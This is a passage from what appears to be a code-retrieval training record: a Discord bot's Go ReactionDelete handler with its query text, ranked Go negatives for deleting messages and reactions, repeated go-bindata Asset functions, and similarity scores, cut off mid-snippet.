f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}" ]
[ "0.73482424", "0.7267638", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.709527", "0.7069936", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481" ]
0.0
-1
ReactionDelete Handle when a reaction is deleted from a message
func (b *Bot) ReactionDelete(s *discordgo.Session, event *discordgo.MessageReactionRemove) { if f, ok := b.Commands.ReactionRemoveCommands[event.Emoji.Name]; ok { f(b, s, event) } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func HandleDeleteRemindCommand(ctx context.Context, s *discordgo.Session, m *discordgo.MessageCreate, content []string) {\n\tuserID := fmt.Sprintf(\"%s-%s\", m.Author.Username, m.Author.ID)\n\n\terr := models.DeleteRemind(ctx, content[1], userID)\n\n\tif err != nil {\n\t\ts.ChannelMessageSend(m.ChannelID, fmt.Sprintf(\"%s\", err))\n\t\ts.MessageReactionAdd(m.ChannelID, m.ID, \"❌\")\n\t\treturn\n\t}\n\ts.MessageReactionAdd(m.ChannelID, m.ID, \"✅\")\n}", "func handleMsgDelete(ctx sdk.Context, k Keeper, msg *MsgDelete) (*sdk.Result, error) {\n\tif err := k.Delete(ctx, msg); err != nil {\n\t\treturn nil, err\n\t}\n\n\tctx.EventManager().EmitEvent(\n\t\tsdk.NewEvent(\n\t\t\tsdk.EventTypeMessage,\n\t\t\tsdk.NewAttribute(sdk.AttributeKeyModule, ModuleName),\n\t\t\tsdk.NewAttribute(sdk.AttributeKeySender, msg.Owner.String()),\n\t\t),\n\t)\n\n\treturn &sdk.Result{Events: ctx.EventManager().Events()}, nil\n}", "func ReactionDelete(\n\tconnections connection.Service,\n\tobjects object.Service,\n\treactions reaction.Service,\n) ReactionDeleteFunc {\n\treturn func(\n\t\tcurrentApp *app.App,\n\t\torigin, postID uint64,\n\t\treactionType reaction.Type,\n\t) error {\n\t\tp, err := PostFetch(objects)(currentApp, postID)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := isPostVisible(connections, currentApp, p.Object, origin); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\trs, err := reactions.Query(currentApp.Namespace(), reaction.QueryOptions{\n\t\t\tDeleted: &defaultDeleted,\n\t\t\tObjectIDs: []uint64{\n\t\t\t\tpostID,\n\t\t\t},\n\t\t\tOwnerIDs: []uint64{\n\t\t\t\torigin,\n\t\t\t},\n\t\t\tTypes: []reaction.Type{\n\t\t\t\treactionType,\n\t\t\t},\n\t\t})\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif len(rs) == 0 {\n\t\t\treturn nil\n\t\t}\n\n\t\treaction := rs[0]\n\t\treaction.Deleted = true\n\n\t\t_, err = reactions.Put(currentApp.Namespace(), reaction)\n\n\t\treturn err\n\t}\n}", "func Delete(s *discordgo.Session, m *discordgo.MessageCreate) {\n}", "func messageReactionRemove(session *discordgo.Session, reaction *discordgo.MessageReactionRemove) {\n\n\t// Bot permissions\n\tbotPermissions, err := session.State.UserChannelPermissions(session.State.User.ID, reaction.ChannelID)\n\n\t// Return if unable to check bot permissions\n\tif err != nil {\n\t\tlog.Println(err)\n\t\treturn\n\t}\n\n\t// Return if bot does not have permission to manage roles\n\tif botPermissions&discordgo.PermissionManageRoles == 0 {\n\t\tsession.ChannelMessage(reaction.ChannelID, \"<@\"+reaction.UserID+\"> I don't have permission to manage roles.\")\n\t\treturn\n\t}\n\n\tfor _, reactionRoleMessage := range reactionrole.Messages {\n\t\tif reaction.MessageID == reactionRoleMessage {\n\t\t\tfor _, reactionRoleCatagory := range reactionrole.Catagories {\n\t\t\t\tfor _, reactionRole := range reactionRoleCatagory.Role {\n\t\t\t\t\tif reactionRole.Emoji.ID == reaction.Emoji.ID {\n\t\t\t\t\t\tsession.GuildMemberRoleRemove(reaction.GuildID, reaction.UserID, reactionRole.ID)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}", "func (client ScheduleMessageClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusNoContent, http.StatusBadRequest, http.StatusUnauthorized, http.StatusForbidden, http.StatusNotFound, http.StatusInternalServerError),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func (c *Config) handleActionDeleteMessage(client MQTT.Client, message MQTT.Message) {\n\tactionsToBeDeleted := []actionmanager.Action{}\n\terr := json.Unmarshal(message.Payload(), &actionsToBeDeleted)\n\tif err != nil {\n\t\tklog.Errorf(\"Error in unmarshalling: %s\", err)\n\t}\n\tfor _, actionToBeDeleted := range actionsToBeDeleted {\n\t\tactionExists := false\n\t\tfor index, action := range c.ActionManager.Actions {\n\t\t\tif strings.EqualFold(action.Name, actionToBeDeleted.Name) {\n\t\t\t\tactionExists = true\n\t\t\t\tcopy(c.ActionManager.Actions[index:], c.ActionManager.Actions[index+1:])\n\t\t\t\tc.ActionManager.Actions = c.ActionManager.Actions[:len(c.ActionManager.Actions)-1]\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tconfiguration.Config.ActionManager = c.ActionManager\n\t\tif !actionExists {\n\t\t\tklog.Errorf(\"Action: %s did not exist\", actionToBeDeleted.Name)\n\t\t} else {\n\t\t\tklog.Infof(\"Action: %s has been deleted \", actionToBeDeleted.Name)\n\t\t}\n\t}\n}", "func (h Handler) Delete(ctx context.Context, request *proto.Identifier) (*proto.Message, error) {\n\terr := h.meta.SetStatus(ctx, request.UserID, deleted)\n\terr = errors.Wrap(err, \"Error while changing status\")\n\treturn &proto.Message{}, err\n}", "func handleMsgDeleteMixnode(ctx sdk.Context, k keeper.Keeper, msg types.MsgDeleteMixnode) (*sdk.Result, error) {\n\tif !k.MixnodeExists(ctx, msg.ID) {\n\t\t// replace with ErrKeyNotFound for 0.39+\n\t\treturn nil, sdkerrors.Wrap(sdkerrors.ErrInvalidRequest, msg.ID)\n\t}\n\tif !msg.Creator.Equals(k.GetMixnodeOwner(ctx, msg.ID)) {\n\t\treturn nil, sdkerrors.Wrap(sdkerrors.ErrUnauthorized, \"Incorrect Owner\")\n\t}\n\n\tk.DeleteMixnode(ctx, msg.ID)\n\treturn &sdk.Result{}, nil\n}", "func (s *session) handleDELE(args []string) error {\n\treturn s.withMessageDo(args[0], func(msgId uint64) error {\n\t\ts.markedDeleted[msgId] = struct{}{}\n\t\treturn s.respondOK(\"message %d deleted\", msgId)\n\t})\n}", "func (p *SignalChannel) HandleDelete(req Request, customer *models.Customer) (res Response, err error) {\n\tlog.Debug(\"[HandleDelete] SignalChannel\")\n\treturn p.forward(req, customer)\n}", "func (l *Logger) OnMessageDelete(ds *discordgo.Session, md *discordgo.MessageDelete) {\n\tif l.LogDeletes == false {\n\t\treturn\n\t}\n\n\t// TODO: Create separate log for bots.\n\tif md.Author.ID == ds.State.User.ID {\n\t\treturn\n\t}\n\n\tlog.Printf(\"%+v\", md)\n\tlog.Printf(\"%+v\", md.Message)\n\n\t// TODO: Implement delete logging\n\tembed := message.GetDefaultEmbed()\n\tembed.Title = \"Message Deleted\"\n\tembed.Description = fmt.Sprintf(\"Message Deleted: %s\", md.Content)\n\n\tmessage.SendEmbed(ds, l.ChannelID, embed)\n}", "func DeleteReaction(ctx context.Context, opts *ReactionOptions) error {\n\treaction := &Reaction{\n\t\tType: opts.Type,\n\t\tUserID: opts.DoerID,\n\t\tIssueID: opts.IssueID,\n\t\tCommentID: opts.CommentID,\n\t}\n\n\tsess := db.GetEngine(ctx).Where(\"original_author_id = 0\")\n\tif opts.CommentID == -1 {\n\t\treaction.CommentID = 0\n\t\tsess.MustCols(\"comment_id\")\n\t}\n\n\t_, err := sess.Delete(reaction)\n\treturn err\n}", "func (s *Storage) updateReactionTargetOnDelete(ctx context.Context, convID chat1.ConversationID,\n\tuid gregor1.UID, reactionMsg *chat1.MessageUnboxed) (*chat1.MessageUnboxed, bool, Error) {\n\ts.Debug(ctx, \"updateReactionTargetOnDelete: reationMsg: %v\", reactionMsg)\n\n\tif reactionMsg.Valid().MessageBody.IsNil() {\n\t\treturn nil, false, nil\n\t}\n\n\ttargetMsgID := reactionMsg.Valid().MessageBody.Reaction().MessageID\n\ttargetMsg, err := s.getMessage(ctx, convID, uid, targetMsgID)\n\tif err != nil || targetMsg == nil {\n\t\treturn nil, false, err\n\t}\n\tif targetMsg.IsValid() {\n\t\tmvalid := targetMsg.Valid()\n\t\treactionIDs := []chat1.MessageID{}\n\t\tfor _, msgID := range mvalid.ServerHeader.ReactionIDs {\n\t\t\tif msgID != reactionMsg.GetMessageID() {\n\t\t\t\treactionIDs = append(reactionIDs, msgID)\n\t\t\t}\n\t\t}\n\t\tupdated := len(mvalid.ServerHeader.ReactionIDs) != len(reactionIDs)\n\t\tmvalid.ServerHeader.ReactionIDs = reactionIDs\n\t\tnewMsg := chat1.NewMessageUnboxedWithValid(mvalid)\n\t\treturn &newMsg, updated, nil\n\t}\n\treturn nil, false, nil\n}", "func (bot Bot) onDelete(s *discordgo.Session, msg *discordgo.MessageCreate) {\n\t//checks if user exists- last message contains a value\n\tif _, exists := bot.allVars.dm[bot.allVars.m[msg.Author.Username]]; exists {\n\t\ts.ChannelMessageDelete(bot.allVars.m[msg.Author.Username], bot.allVars.dm[bot.allVars.m[msg.Author.Username]])\n\t\ts.ChannelMessageSend(msg.ChannelID, \"The message has been deleted\")\n\t} else {\n\t\t//if user doesnt exist return\n\t\ts.ChannelMessageSend(msg.ChannelID, \"There is no prior message available to be deleted\")\n\t}\n}", "func messageDelete(w http.ResponseWriter, r *http.Request) {\n\tvar rBody request\n\n\tif err := json.NewDecoder(r.Body).Decode(&rBody); err != nil {\n\t\thttp.Error(w, fmt.Sprintf(\"Unable to decode message\", err.Error()), http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tid, err := strconv.Atoi(mux.Vars(r)[\"id\"])\n\tif err != nil {\n\t\thttp.Error(w, fmt.Sprintf(\"Unable to convert ID to int. Error: %v\", err), http.StatusBadRequest)\n\t\treturn\n\t}\n\n\terr = models.DeleteMessage(id)\n\tif err != nil {\n\t\thttp.Error(w, fmt.Sprintf(\"Unable to delete message. Error: %v\", err), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\ttype deleteMessage struct {\n\t\tdefaultProperties\n\t\tID int `json:\"id\"`\n\t}\n\n\tpayload := deleteMessage{\n\t\tdefaultProperties: defaultProperties{\n\t\t\tChannel: rBody.Channel,\n\t\t\tType: \"message\",\n\t\t\tSubType: \"message_deleted\",\n\t\t},\n\t\tID: id,\n\t}\n\n\t// prep for ws\n\tbytes, err := json.Marshal(payload)\n\tif err != nil {\n\t\thttp.Error(w, fmt.Sprintf(\"Unable to marshal chat message\", err.Error()), http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tpubMessage := hub.PublishMessage{\n\t\tTopic: 